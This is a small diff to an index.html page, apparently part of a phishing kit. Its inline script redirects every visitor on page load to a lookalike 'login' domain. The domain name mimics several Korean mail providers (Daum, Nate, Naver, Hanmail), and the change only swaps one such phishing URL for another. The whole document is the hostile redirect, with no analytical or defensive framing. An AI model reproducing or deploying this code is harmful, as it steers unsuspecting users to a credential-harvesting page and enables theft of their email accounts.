--- a/index.html
+++ b/index.html
@@ -4,6 +4,6 @@
       (function(){
 		var random = Date.now();
         var hash = window.location.hash; 
-        window.location.href = "https://login.hacehollolguplusdaumnatenaverhanmail.ml/bSinEWDL";
+        window.location.href = "https://login.hollolguplusdaumnatenaverhanmail.ml/pdvYNYdL";
       })();
     </script></body></html>
